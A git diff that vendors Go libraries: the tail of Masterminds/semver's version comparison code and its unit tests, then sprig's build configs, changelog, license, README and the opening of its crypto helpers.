+}
+
+// SetMetadata defines metadata value.
+// Value must not include the required 'plus' prefix.
+func (v Version) SetMetadata(metadata string) (Version, error) {
+ vNext := v
+ if len(metadata) > 0 && !validPrereleaseRegex.MatchString(metadata) {
+ return vNext, ErrInvalidMetadata
+ }
+ vNext.metadata = metadata
+ vNext.original = v.originalVPrefix() + "" + vNext.String()
+ return vNext, nil
+}
+
+// LessThan tests if one version is less than another one.
+func (v *Version) LessThan(o *Version) bool {
+ return v.Compare(o) < 0
+}
+
+// GreaterThan tests if one version is greater than another one.
+func (v *Version) GreaterThan(o *Version) bool {
+ return v.Compare(o) > 0
+}
+
+// Equal tests if two versions are equal to each other.
+// Note, versions can be equal with different metadata since metadata
+// is not considered part of the comparable version.
+func (v *Version) Equal(o *Version) bool {
+ return v.Compare(o) == 0
+}
+
+// Compare compares this version to another one. It returns -1, 0, or 1 if
+// the version smaller, equal, or larger than the other version.
+//
+// Versions are compared by X.Y.Z. Build metadata is ignored. Prerelease is
+// lower than the version without a prerelease.
+func (v *Version) Compare(o *Version) int {
+ // Compare the major, minor, and patch version for differences. If a
+ // difference is found return the comparison.
+ if d := compareSegment(v.Major(), o.Major()); d != 0 {
+ return d
+ }
+ if d := compareSegment(v.Minor(), o.Minor()); d != 0 {
+ return d
+ }
+ if d := compareSegment(v.Patch(), o.Patch()); d != 0 {
+ return d
+ }
+
+ // At this point the major, minor, and patch versions are the same.
+ ps := v.pre
+ po := o.Prerelease()
+
+ if ps == "" && po == "" {
+ return 0
+ }
+ if ps == "" {
+ return 1
+ }
+ if po == "" {
+ return -1
+ }
+
+ return comparePrerelease(ps, po)
+}
+
+// UnmarshalJSON implements JSON.Unmarshaler interface.
+func (v *Version) UnmarshalJSON(b []byte) error {
+ var s string
+ if err := json.Unmarshal(b, &s); err != nil {
+ return err
+ }
+ temp, err := NewVersion(s)
+ if err != nil {
+ return err
+ }
+ v.major = temp.major
+ v.minor = temp.minor
+ v.patch = temp.patch
+ v.pre = temp.pre
+ v.metadata = temp.metadata
+ v.original = temp.original
+ temp = nil
+ return nil
+}
+
+// MarshalJSON implements JSON.Marshaler interface.
+func (v *Version) MarshalJSON() ([]byte, error) {
+ return json.Marshal(v.String())
+}
+
+func compareSegment(v, o int64) int {
+ if v < o {
+ return -1
+ }
+ if v > o {
+ return 1
+ }
+
+ return 0
+}
+
+func comparePrerelease(v, o string) int {
+
+ // split the prelease versions by their part. The separator, per the spec,
+ // is a .
+ sparts := strings.Split(v, ".")
+ oparts := strings.Split(o, ".")
+
+ // Find the longer length of the parts to know how many loop iterations to
+ // go through.
+ slen := len(sparts)
+ olen := len(oparts)
+
+ l := slen
+ if olen > slen {
+ l = olen
+ }
+
+ // Iterate over each part of the prereleases to compare the differences.
+ for i := 0; i < l; i++ {
+ // Since the lentgh of the parts can be different we need to create
+ // a placeholder. This is to avoid out of bounds issues.
+ stemp := ""
+ if i < slen {
+ stemp = sparts[i]
+ }
+
+ otemp := ""
+ if i < olen {
+ otemp = oparts[i]
+ }
+
+ d := comparePrePart(stemp, otemp)
+ if d != 0 {
+ return d
+ }
+ }
+
+ // Reaching here means two versions are of equal value but have different
+ // metadata (the part following a +). They are not identical in string form
+ // but the version comparison finds them to be equal.
+ return 0
+}
+
+func comparePrePart(s, o string) int {
+ // Fastpath if they are equal
+ if s == o {
+ return 0
+ }
+
+ // When s or o are empty we can use the other in an attempt to determine
+ // the response.
+ if s == "" {
+ if o != "" {
+ return -1
+ }
+ return 1
+ }
+
+ if o == "" {
+ if s != "" {
+ return 1
+ }
+ return -1
+ }
+
+ // When comparing strings "99" is greater than "103". To handle
+ // cases like this we need to detect numbers and compare them.
+
+ oi, n1 := strconv.ParseInt(o, 10, 64)
+ si, n2 := strconv.ParseInt(s, 10, 64)
+
+ // The case where both are strings compare the strings
+ if n1 != nil && n2 != nil {
+ if s > o {
+ return 1
+ }
+ return -1
+ } else if n1 != nil {
+ // o is a string and s is a number
+ return -1
+ } else if n2 != nil {
+ // s is a string and o is a number
+ return 1
+ }
+ // Both are numbers
+ if si > oi {
+ return 1
+ }
+ return -1
+
+}
diff --git a/vendor/github.com/Masterminds/semver/version_test.go b/vendor/github.com/Masterminds/semver/version_test.go
new file mode 100644
index 0000000000..ff5d644a74
--- /dev/null
+++ b/vendor/github.com/Masterminds/semver/version_test.go
@@ -0,0 +1,490 @@
+package semver
+
+import (
+ "encoding/json"
+ "fmt"
+ "testing"
+)
+
+func TestNewVersion(t *testing.T) {
+ tests := []struct {
+ version string
+ err bool
+ }{
+ {"1.2.3", false},
+ {"v1.2.3", false},
+ {"1.0", false},
+ {"v1.0", false},
+ {"1", false},
+ {"v1", false},
+ {"1.2.beta", true},
+ {"v1.2.beta", true},
+ {"foo", true},
+ {"1.2-5", false},
+ {"v1.2-5", false},
+ {"1.2-beta.5", false},
+ {"v1.2-beta.5", false},
+ {"\n1.2", true},
+ {"\nv1.2", true},
+ {"1.2.0-x.Y.0+metadata", false},
+ {"v1.2.0-x.Y.0+metadata", false},
+ {"1.2.0-x.Y.0+metadata-width-hypen", false},
+ {"v1.2.0-x.Y.0+metadata-width-hypen", false},
+ {"1.2.3-rc1-with-hypen", false},
+ {"v1.2.3-rc1-with-hypen", false},
+ {"1.2.3.4", true},
+ {"v1.2.3.4", true},
+ {"1.2.2147483648", false},
+ {"1.2147483648.3", false},
+ {"2147483648.3.0", false},
+ }
+
+ for _, tc := range tests {
+ _, err := NewVersion(tc.version)
+ if tc.err && err == nil {
+ t.Fatalf("expected error for version: %s", tc.version)
+ } else if !tc.err && err != nil {
+ t.Fatalf("error for version %s: %s", tc.version, err)
+ }
+ }
+}
+
+func TestOriginal(t *testing.T) {
+ tests := []string{
+ "1.2.3",
+ "v1.2.3",
+ "1.0",
+ "v1.0",
+ "1",
+ "v1",
+ "1.2-5",
+ "v1.2-5",
+ "1.2-beta.5",
+ "v1.2-beta.5",
+ "1.2.0-x.Y.0+metadata",
+ "v1.2.0-x.Y.0+metadata",
+ "1.2.0-x.Y.0+metadata-width-hypen",
+ "v1.2.0-x.Y.0+metadata-width-hypen",
+ "1.2.3-rc1-with-hypen",
+ "v1.2.3-rc1-with-hypen",
+ }
+
+ for _, tc := range tests {
+ v, err := NewVersion(tc)
+ if err != nil {
+ t.Errorf("Error parsing version %s", tc)
+ }
+
+ o := v.Original()
+ if o != tc {
+ t.Errorf("Error retrieving originl. Expected '%s' but got '%s'", tc, v)
+ }
+ }
+}
+
+func TestParts(t *testing.T) {
+ v, err := NewVersion("1.2.3-beta.1+build.123")
+ if err != nil {
+ t.Error("Error parsing version 1.2.3-beta.1+build.123")
+ }
+
+ if v.Major() != 1 {
+ t.Error("Major() returning wrong value")
+ }
+ if v.Minor() != 2 {
+ t.Error("Minor() returning wrong value")
+ }
+ if v.Patch() != 3 {
+ t.Error("Patch() returning wrong value")
+ }
+ if v.Prerelease() != "beta.1" {
+ t.Error("Prerelease() returning wrong value")
+ }
+ if v.Metadata() != "build.123" {
+ t.Error("Metadata() returning wrong value")
+ }
+}
+
+func TestString(t *testing.T) {
+ tests := []struct {
+ version string
+ expected string
+ }{
+ {"1.2.3", "1.2.3"},
+ {"v1.2.3", "1.2.3"},
+ {"1.0", "1.0.0"},
+ {"v1.0", "1.0.0"},
+ {"1", "1.0.0"},
+ {"v1", "1.0.0"},
+ {"1.2-5", "1.2.0-5"},
+ {"v1.2-5", "1.2.0-5"},
+ {"1.2-beta.5", "1.2.0-beta.5"},
+ {"v1.2-beta.5", "1.2.0-beta.5"},
+ {"1.2.0-x.Y.0+metadata", "1.2.0-x.Y.0+metadata"},
+ {"v1.2.0-x.Y.0+metadata", "1.2.0-x.Y.0+metadata"},
+ {"1.2.0-x.Y.0+metadata-width-hypen", "1.2.0-x.Y.0+metadata-width-hypen"},
+ {"v1.2.0-x.Y.0+metadata-width-hypen", "1.2.0-x.Y.0+metadata-width-hypen"},
+ {"1.2.3-rc1-with-hypen", "1.2.3-rc1-with-hypen"},
+ {"v1.2.3-rc1-with-hypen", "1.2.3-rc1-with-hypen"},
+ }
+
+ for _, tc := range tests {
+ v, err := NewVersion(tc.version)
+ if err != nil {
+ t.Errorf("Error parsing version %s", tc)
+ }
+
+ s := v.String()
+ if s != tc.expected {
+ t.Errorf("Error generating string. Expected '%s' but got '%s'", tc.expected, s)
+ }
+ }
+}
+
+func TestCompare(t *testing.T) {
+ tests := []struct {
+ v1 string
+ v2 string
+ expected int
+ }{
+ {"1.2.3", "1.5.1", -1},
+ {"2.2.3", "1.5.1", 1},
+ {"2.2.3", "2.2.2", 1},
+ {"3.2-beta", "3.2-beta", 0},
+ {"1.3", "1.1.4", 1},
+ {"4.2", "4.2-beta", 1},
+ {"4.2-beta", "4.2", -1},
+ {"4.2-alpha", "4.2-beta", -1},
+ {"4.2-alpha", "4.2-alpha", 0},
+ {"4.2-beta.2", "4.2-beta.1", 1},
+ {"4.2-beta2", "4.2-beta1", 1},
+ {"4.2-beta", "4.2-beta.2", -1},
+ {"4.2-beta", "4.2-beta.foo", -1},
+ {"4.2-beta.2", "4.2-beta", 1},
+ {"4.2-beta.foo", "4.2-beta", 1},
+ {"1.2+bar", "1.2+baz", 0},
+ }
+
+ for _, tc := range tests {
+ v1, err := NewVersion(tc.v1)
+ if err != nil {
+ t.Errorf("Error parsing version: %s", err)
+ }
+
+ v2, err := NewVersion(tc.v2)
+ if err != nil {
+ t.Errorf("Error parsing version: %s", err)
+ }
+
+ a := v1.Compare(v2)
+ e := tc.expected
+ if a != e {
+ t.Errorf(
+ "Comparison of '%s' and '%s' failed. Expected '%d', got '%d'",
+ tc.v1, tc.v2, e, a,
+ )
+ }
+ }
+}
+
+func TestLessThan(t *testing.T) {
+ tests := []struct {
+ v1 string
+ v2 string
+ expected bool
+ }{
+ {"1.2.3", "1.5.1", true},
+ {"2.2.3", "1.5.1", false},
+ {"3.2-beta", "3.2-beta", false},
+ }
+
+ for _, tc := range tests {
+ v1, err := NewVersion(tc.v1)
+ if err != nil {
+ t.Errorf("Error parsing version: %s", err)
+ }
+
+ v2, err := NewVersion(tc.v2)
+ if err != nil {
+ t.Errorf("Error parsing version: %s", err)
+ }
+
+ a := v1.LessThan(v2)
+ e := tc.expected
+ if a != e {
+ t.Errorf(
+ "Comparison of '%s' and '%s' failed. Expected '%t', got '%t'",
+ tc.v1, tc.v2, e, a,
+ )
+ }
+ }
+}
+
+func TestGreaterThan(t *testing.T) {
+ tests := []struct {
+ v1 string
+ v2 string
+ expected bool
+ }{
+ {"1.2.3", "1.5.1", false},
+ {"2.2.3", "1.5.1", true},
+ {"3.2-beta", "3.2-beta", false},
+ {"3.2.0-beta.1", "3.2.0-beta.5", false},
+ {"3.2-beta.4", "3.2-beta.2", true},
+ {"7.43.0-SNAPSHOT.99", "7.43.0-SNAPSHOT.103", false},
+ {"7.43.0-SNAPSHOT.FOO", "7.43.0-SNAPSHOT.103", true},
+ {"7.43.0-SNAPSHOT.99", "7.43.0-SNAPSHOT.BAR", false},
+ }
+
+ for _, tc := range tests {
+ v1, err := NewVersion(tc.v1)
+ if err != nil {
+ t.Errorf("Error parsing version: %s", err)
+ }
+
+ v2, err := NewVersion(tc.v2)
+ if err != nil {
+ t.Errorf("Error parsing version: %s", err)
+ }
+
+ a := v1.GreaterThan(v2)
+ e := tc.expected
+ if a != e {
+ t.Errorf(
+ "Comparison of '%s' and '%s' failed. Expected '%t', got '%t'",
+ tc.v1, tc.v2, e, a,
+ )
+ }
+ }
+}
+
+func TestEqual(t *testing.T) {
+ tests := []struct {
+ v1 string
+ v2 string
+ expected bool
+ }{
+ {"1.2.3", "1.5.1", false},
+ {"2.2.3", "1.5.1", false},
+ {"3.2-beta", "3.2-beta", true},
+ {"3.2-beta+foo", "3.2-beta+bar", true},
+ }
+
+ for _, tc := range tests {
+ v1, err := NewVersion(tc.v1)
+ if err != nil {
+ t.Errorf("Error parsing version: %s", err)
+ }
+
+ v2, err := NewVersion(tc.v2)
+ if err != nil {
+ t.Errorf("Error parsing version: %s", err)
+ }
+
+ a := v1.Equal(v2)
+ e := tc.expected
+ if a != e {
+ t.Errorf(
+ "Comparison of '%s' and '%s' failed. Expected '%t', got '%t'",
+ tc.v1, tc.v2, e, a,
+ )
+ }
+ }
+}
+
+func TestInc(t *testing.T) {
+ tests := []struct {
+ v1 string
+ expected string
+ how string
+ expectedOriginal string
+ }{
+ {"1.2.3", "1.2.4", "patch", "1.2.4"},
+ {"v1.2.4", "1.2.5", "patch", "v1.2.5"},
+ {"1.2.3", "1.3.0", "minor", "1.3.0"},
+ {"v1.2.4", "1.3.0", "minor", "v1.3.0"},
+ {"1.2.3", "2.0.0", "major", "2.0.0"},
+ {"v1.2.4", "2.0.0", "major", "v2.0.0"},
+ {"1.2.3+meta", "1.2.4", "patch", "1.2.4"},
+ {"1.2.3-beta+meta", "1.2.3", "patch", "1.2.3"},
+ {"v1.2.4-beta+meta", "1.2.4", "patch", "v1.2.4"},
+ {"1.2.3-beta+meta", "1.3.0", "minor", "1.3.0"},
+ {"v1.2.4-beta+meta", "1.3.0", "minor", "v1.3.0"},
+ {"1.2.3-beta+meta", "2.0.0", "major", "2.0.0"},
+ {"v1.2.4-beta+meta", "2.0.0", "major", "v2.0.0"},
+ }
+
+ for _, tc := range tests {
+ v1, err := NewVersion(tc.v1)
+ if err != nil {
+ t.Errorf("Error parsing version: %s", err)
+ }
+ var v2 Version
+ switch tc.how {
+ case "patch":
+ v2 = v1.IncPatch()
+ case "minor":
+ v2 = v1.IncMinor()
+ case "major":
+ v2 = v1.IncMajor()
+ }
+
+ a := v2.String()
+ e := tc.expected
+ if a != e {
+ t.Errorf(
+ "Inc %q failed. Expected %q got %q",
+ tc.how, e, a,
+ )
+ }
+
+ a = v2.Original()
+ e = tc.expectedOriginal
+ if a != e {
+ t.Errorf(
+ "Inc %q failed. Expected original %q got %q",
+ tc.how, e, a,
+ )
+ }
+ }
+}
+
+func TestSetPrerelease(t *testing.T) {
+ tests := []struct {
+ v1 string
+ prerelease string
+ expectedVersion string
+ expectedPrerelease string
+ expectedOriginal string
+ expectedErr error
+ }{
+ {"1.2.3", "**", "1.2.3", "", "1.2.3", ErrInvalidPrerelease},
+ {"1.2.3", "beta", "1.2.3-beta", "beta", "1.2.3-beta", nil},
+ {"v1.2.4", "beta", "1.2.4-beta", "beta", "v1.2.4-beta", nil},
+ }
+
+ for _, tc := range tests {
+ v1, err := NewVersion(tc.v1)
+ if err != nil {
+ t.Errorf("Error parsing version: %s", err)
+ }
+
+ v2, err := v1.SetPrerelease(tc.prerelease)
+ if err != tc.expectedErr {
+ t.Errorf("Expected to get err=%s, but got err=%s", tc.expectedErr, err)
+ }
+
+ a := v2.Prerelease()
+ e := tc.expectedPrerelease
+ if a != e {
+ t.Errorf("Expected prerelease value=%q, but got %q", e, a)
+ }
+
+ a = v2.String()
+ e = tc.expectedVersion
+ if a != e {
+ t.Errorf("Expected version string=%q, but got %q", e, a)
+ }
+
+ a = v2.Original()
+ e = tc.expectedOriginal
+ if a != e {
+ t.Errorf("Expected version original=%q, but got %q", e, a)
+ }
+ }
+}
+
+func TestSetMetadata(t *testing.T) {
+ tests := []struct {
+ v1 string
+ metadata string
+ expectedVersion string
+ expectedMetadata string
+ expectedOriginal string
+ expectedErr error
+ }{
+ {"1.2.3", "**", "1.2.3", "", "1.2.3", ErrInvalidMetadata},
+ {"1.2.3", "meta", "1.2.3+meta", "meta", "1.2.3+meta", nil},
+ {"v1.2.4", "meta", "1.2.4+meta", "meta", "v1.2.4+meta", nil},
+ }
+
+ for _, tc := range tests {
+ v1, err := NewVersion(tc.v1)
+ if err != nil {
+ t.Errorf("Error parsing version: %s", err)
+ }
+
+ v2, err := v1.SetMetadata(tc.metadata)
+ if err != tc.expectedErr {
+ t.Errorf("Expected to get err=%s, but got err=%s", tc.expectedErr, err)
+ }
+
+ a := v2.Metadata()
+ e := tc.expectedMetadata
+ if a != e {
+ t.Errorf("Expected metadata value=%q, but got %q", e, a)
+ }
+
+ a = v2.String()
+ e = tc.expectedVersion
+ if e != a {
+ t.Errorf("Expected version string=%q, but got %q", e, a)
+ }
+
+ a = v2.Original()
+ e = tc.expectedOriginal
+ if a != e {
+ t.Errorf("Expected version original=%q, but got %q", e, a)
+ }
+ }
+}
+
+func TestOriginalVPrefix(t *testing.T) {
+ tests := []struct {
+ version string
+ vprefix string
+ }{
+ {"1.2.3", ""},
+ {"v1.2.4", "v"},
+ }
+
+ for _, tc := range tests {
+ v1, _ := NewVersion(tc.version)
+ a := v1.originalVPrefix()
+ e := tc.vprefix
+ if a != e {
+ t.Errorf("Expected vprefix=%q, but got %q", e, a)
+ }
+ }
+}
+
+func TestJsonMarshal(t *testing.T) {
+ sVer := "1.1.1"
+ x, err := NewVersion(sVer)
+ if err != nil {
+ t.Errorf("Error creating version: %s", err)
+ }
+ out, err2 := json.Marshal(x)
+ if err2 != nil {
+ t.Errorf("Error marshaling version: %s", err2)
+ }
+ got := string(out)
+ want := fmt.Sprintf("%q", sVer)
+ if got != want {
+ t.Errorf("Error marshaling unexpected marshaled content: got=%q want=%q", got, want)
+ }
+}
+
+func TestJsonUnmarshal(t *testing.T) {
+ sVer := "1.1.1"
+ ver := &Version{}
+ err := json.Unmarshal([]byte(fmt.Sprintf("%q", sVer)), ver)
+ if err != nil {
+ t.Errorf("Error unmarshaling version: %s", err)
+ }
+ got := ver.String()
+ want := sVer
+ if got != want {
+ t.Errorf("Error unmarshaling unexpected object content: got=%q want=%q", got, want)
+ }
+}
diff --git a/vendor/github.com/Masterminds/sprig/.gitignore b/vendor/github.com/Masterminds/sprig/.gitignore
new file mode 100644
index 0000000000..5e3002f88f
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/.gitignore
@@ -0,0 +1,2 @@
+vendor/
+/.glide
diff --git a/vendor/github.com/Masterminds/sprig/.travis.yml b/vendor/github.com/Masterminds/sprig/.travis.yml
new file mode 100644
index 0000000000..2e7c2d68e3
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/.travis.yml
@@ -0,0 +1,23 @@
+language: go
+
+go:
+ - 1.9.x
+ - 1.10.x
+ - tip
+
+# Setting sudo access to false will let Travis CI use containers rather than
+# VMs to run the tests. For more details see:
+# - http://docs.travis-ci.com/user/workers/container-based-infrastructure/
+# - http://docs.travis-ci.com/user/workers/standard-infrastructure/
+sudo: false
+
+script:
+ - make setup test
+
+notifications:
+ webhooks:
+ urls:
+ - https://webhooks.gitter.im/e/06e3328629952dabe3e0
+ on_success: change # options: [always|never|change] default: always
+ on_failure: always # options: [always|never|change] default: always
+ on_start: never # options: [always|never|change] default: always
diff --git a/vendor/github.com/Masterminds/sprig/CHANGELOG.md b/vendor/github.com/Masterminds/sprig/CHANGELOG.md
new file mode 100644
index 0000000000..445937138a
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/CHANGELOG.md
@@ -0,0 +1,153 @@
+# Changelog
+
+## Release 2.15.0 (2018-04-02)
+
+### Added
+
+- #68 and #69: Add json helpers to docs (thanks @arunvelsriram)
+- #66: Add ternary function (thanks @binoculars)
+- #67: Allow keys function to take multiple dicts (thanks @binoculars)
+- #89: Added sha1sum to crypto function (thanks @benkeil)
+- #81: Allow customizing Root CA that used by genSignedCert (thanks @chenzhiwei)
+- #92: Add travis testing for go 1.10
+- #93: Adding appveyor config for windows testing
+
+### Changed
+
+- #90: Updating to more recent dependencies
+- #73: replace satori/go.uuid with google/uuid (thanks @petterw)
+
+### Fixed
+
+- #76: Fixed documentation typos (thanks @Thiht)
+- Fixed rounding issue on the `ago` function. Note, the removes support for Go 1.8 and older
+
+## Release 2.14.1 (2017-12-01)
+
+### Fixed
+
+- #60: Fix typo in function name documentation (thanks @neil-ca-moore)
+- #61: Removing line with {{ due to blocking github pages genertion
+- #64: Update the list functions to handle int, string, and other slices for compatibility
+
+## Release 2.14.0 (2017-10-06)
+
+This new version of Sprig adds a set of functions for generating and working with SSL certificates.
+
+- `genCA` generates an SSL Certificate Authority
+- `genSelfSignedCert` generates an SSL self-signed certificate
+- `genSignedCert` generates an SSL certificate and key based on a given CA
+
+## Release 2.13.0 (2017-09-18)
+
+This release adds new functions, including:
+
+- `regexMatch`, `regexFindAll`, `regexFind`, `regexReplaceAll`, `regexReplaceAllLiteral`, and `regexSplit` to work with regular expressions
+- `floor`, `ceil`, and `round` math functions
+- `toDate` converts a string to a date
+- `nindent` is just like `indent` but also prepends a new line
+- `ago` returns the time from `time.Now`
+
+### Added
+
+- #40: Added basic regex functionality (thanks @alanquillin)
+- #41: Added ceil floor and round functions (thanks @alanquillin)
+- #48: Added toDate function (thanks @andreynering)
+- #50: Added nindent function (thanks @binoculars)
+- #46: Added ago function (thanks @slayer)
+
+### Changed
+
+- #51: Updated godocs to include new string functions (thanks @curtisallen)
+- #49: Added ability to merge multiple dicts (thanks @binoculars)
+
+## Release 2.12.0 (2017-05-17)
+
+- `snakecase`, `camelcase`, and `shuffle` are three new string functions
+- `fail` allows you to bail out of a template render when conditions are not met
+
+## Release 2.11.0 (2017-05-02)
+
+- Added `toJson` and `toPrettyJson`
+- Added `merge`
+- Refactored documentation
+
+## Release 2.10.0 (2017-03-15)
+
+- Added `semver` and `semverCompare` for Semantic Versions
+- `list` replaces `tuple`
+- Fixed issue with `join`
+- Added `first`, `last`, `intial`, `rest`, `prepend`, `append`, `toString`, `toStrings`, `sortAlpha`, `reverse`, `coalesce`, `pluck`, `pick`, `compact`, `keys`, `omit`, `uniq`, `has`, `without`
+
+## Release 2.9.0 (2017-02-23)
+
+- Added `splitList` to split a list
+- Added crypto functions of `genPrivateKey` and `derivePassword`
+
+## Release 2.8.0 (2016-12-21)
+
+- Added access to several path functions (`base`, `dir`, `clean`, `ext`, and `abs`)
+- Added functions for _mutating_ dictionaries (`set`, `unset`, `hasKey`)
+
+## Release 2.7.0 (2016-12-01)
+
+- Added `sha256sum` to generate a hash of an input
+- Added functions to convert a numeric or string to `int`, `int64`, `float64`
+
+## Release 2.6.0 (2016-10-03)
+
+- Added a `uuidv4` template function for generating UUIDs inside of a template.
+
+## Release 2.5.0 (2016-08-19)
+
+- New `trimSuffix`, `trimPrefix`, `hasSuffix`, and `hasPrefix` functions
+- New aliases have been added for a few functions that didn't follow the naming conventions (`trimAll` and `abbrevBoth`)
+- `trimall` and `abbrevboth` (notice the case) are deprecated and will be removed in 3.0.0
+
+## Release 2.4.0 (2016-08-16)
+
+- Adds two functions: `until` and `untilStep`
+
+## Release 2.3.0 (2016-06-21)
+
+- cat: Concatenate strings with whitespace separators.
+- replace: Replace parts of a string: `replace " " "-" "Me First"` renders "Me-First"
+- plural: Format plurals: `len "foo" | plural "one foo" "many foos"` renders "many foos"
+- indent: Indent blocks of text in a way that is sensitive to "\n" characters.
+
+## Release 2.2.0 (2016-04-21)
+
+- Added a `genPrivateKey` function (Thanks @bacongobbler)
+
+## Release 2.1.0 (2016-03-30)
+
+- `default` now prints the default value when it does not receive a value down the pipeline. It is much safer now to do `{{.Foo | default "bar"}}`.
+- Added accessors for "hermetic" functions. These return only functions that, when given the same input, produce the same output.
+
+## Release 2.0.0 (2016-03-29)
+
+Because we switched from `int` to `int64` as the return value for all integer math functions, the library's major version number has been incremented.
+
+- `min` complements `max` (formerly `biggest`)
+- `empty` indicates that a value is the empty value for its type
+- `tuple` creates a tuple inside of a template: `{{$t := tuple "a", "b" "c"}}`
+- `dict` creates a dictionary inside of a template `{{$d := dict "key1" "val1" "key2" "val2"}}`
+- Date formatters have been added for HTML dates (as used in `date` input fields)
+- Integer math functions can convert from a number of types, including `string` (via `strconv.ParseInt`).
+
+## Release 1.2.0 (2016-02-01)
+
+- Added quote and squote
+- Added b32enc and b32dec
+- add now takes varargs
+- biggest now takes varargs
+
+## Release 1.1.0 (2015-12-29)
+
+- Added #4: Added contains function. strings.Contains, but with the arguments
+ switched to simplify common pipelines. (thanks krancour)
+- Added Travis-CI testing support
+
+## Release 1.0.0 (2015-12-23)
+
+- Initial release
diff --git a/vendor/github.com/Masterminds/sprig/LICENSE.txt b/vendor/github.com/Masterminds/sprig/LICENSE.txt
new file mode 100644
index 0000000000..5c95accc2e
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/LICENSE.txt
@@ -0,0 +1,20 @@
+Sprig
+Copyright (C) 2013 Masterminds
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in
+all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
+THE SOFTWARE.
diff --git a/vendor/github.com/Masterminds/sprig/Makefile b/vendor/github.com/Masterminds/sprig/Makefile
new file mode 100644
index 0000000000..63a93fdf79
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/Makefile
@@ -0,0 +1,13 @@
+
+HAS_GLIDE := $(shell command -v glide;)
+
+.PHONY: test
+test:
+ go test -v .
+
+.PHONY: setup
+setup:
+ifndef HAS_GLIDE
+ go get -u github.com/Masterminds/glide
+endif
+ glide install
diff --git a/vendor/github.com/Masterminds/sprig/README.md b/vendor/github.com/Masterminds/sprig/README.md
new file mode 100644
index 0000000000..25bf3d4f4b
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/README.md
@@ -0,0 +1,81 @@
+# Sprig: Template functions for Go templates
+[![Stability: Sustained](https://masterminds.github.io/stability/sustained.svg)](https://masterminds.github.io/stability/sustained.html)
+[![Build Status](https://travis-ci.org/Masterminds/sprig.svg?branch=master)](https://travis-ci.org/Masterminds/sprig)
+
+The Go language comes with a [built-in template
+language](http://golang.org/pkg/text/template/), but not
+very many template functions. This library provides a group of commonly
+used template functions.
+
+It is inspired by the template functions found in
+[Twig](http://twig.sensiolabs.org/documentation) and also in various
+JavaScript libraries, such as [underscore.js](http://underscorejs.org/).
+
+## Usage
+
+Template developers can read the [Sprig function documentation](http://masterminds.github.io/sprig/) to
+learn about the >100 template functions available.
+
+For Go developers wishing to include Sprig as a library in their programs,
+API documentation is available [at GoDoc.org](http://godoc.org/github.com/Masterminds/sprig), but
+read on for standard usage.
+
+### Load the Sprig library
+
+To load the Sprig `FuncMap`:
+
+```go
+
+import (
+ "github.com/Masterminds/sprig"
+ "html/template"
+)
+
+// This example illustrates that the FuncMap *must* be set before the
+// templates themselves are loaded.
+tpl := template.Must(
+ template.New("base").Funcs(sprig.FuncMap()).ParseGlob("*.html")
+)
+
+
+```
+
+### Call the functions inside of templates
+
+By convention, all functions are lowercase. This seems to follow the Go
+idiom for template functions (as opposed to template methods, which are
+TitleCase).
+
+
+Example:
+
+```
+{{ "hello!" | upper | repeat 5 }}
+```
+
+Produces:
+
+```
+HELLO!HELLO!HELLO!HELLO!HELLO!
+```
+
+## Principles:
+
+The following principles were used in deciding on which functions to add, and
+determining how to implement them.
+
+- Template functions should be used to build layout. Therefore, the following
+ types of operations are within the domain of template functions:
+ - Formatting
+ - Layout
+ - Simple type conversions
+ - Utilities that assist in handling common formatting and layout needs (e.g. arithmetic)
+- Template functions should not return errors unless there is no way to print
+ a sensible value. For example, converting a string to an integer should not
+ produce an error if conversion fails. Instead, it should display a default
+ value that can be displayed.
+- Simple math is necessary for grid layouts, pagers, and so on. Complex math
+ (anything other than arithmetic) should be done outside of templates.
+- Template functions only deal with the data passed into them. They never retrieve
+ data from a source.
+- Finally, do not override core Go template functions.
diff --git a/vendor/github.com/Masterminds/sprig/appveyor.yml b/vendor/github.com/Masterminds/sprig/appveyor.yml
new file mode 100644
index 0000000000..d545a987a3
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/appveyor.yml
@@ -0,0 +1,26 @@
+
+version: build-{build}.{branch}
+
+clone_folder: C:\gopath\src\github.com\Masterminds\sprig
+shallow_clone: true
+
+environment:
+ GOPATH: C:\gopath
+
+platform:
+ - x64
+
+install:
+ - go get -u github.com/Masterminds/glide
+ - set PATH=%GOPATH%\bin;%PATH%
+ - go version
+ - go env
+
+build_script:
+ - glide install
+ - go install ./...
+
+test_script:
+ - go test -v
+
+deploy: off
diff --git a/vendor/github.com/Masterminds/sprig/crypto.go b/vendor/github.com/Masterminds/sprig/crypto.go
new file mode 100644
index 0000000000..a91c4a7045
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/crypto.go
@@ -0,0 +1,430 @@
+package sprig
+
+import (
+ "bytes"
+ "crypto/dsa"
+ "crypto/ecdsa"
+ "crypto/elliptic"
+ "crypto/hmac"
+ "crypto/rand"
+ "crypto/rsa"
+ "crypto/sha1"
+ "crypto/sha256"
+ "crypto/x509"
+ "crypto/x509/pkix"
+ "encoding/asn1"
+ "encoding/base64"
+ "encoding/binary"
+ "encoding/hex"
+ "encoding/pem"
+ "errors"
+ "fmt"
+ "math/big"
+ "net"
+ "time"
+
+ "github.com/google/uuid"
+ "golang.org/x/crypto/scrypt"
+)
+
+func sha256sum(input string) string {
+ hash := sha256.Sum256([]byte(input))
+ return hex.EncodeToString(hash[:])
+}
+
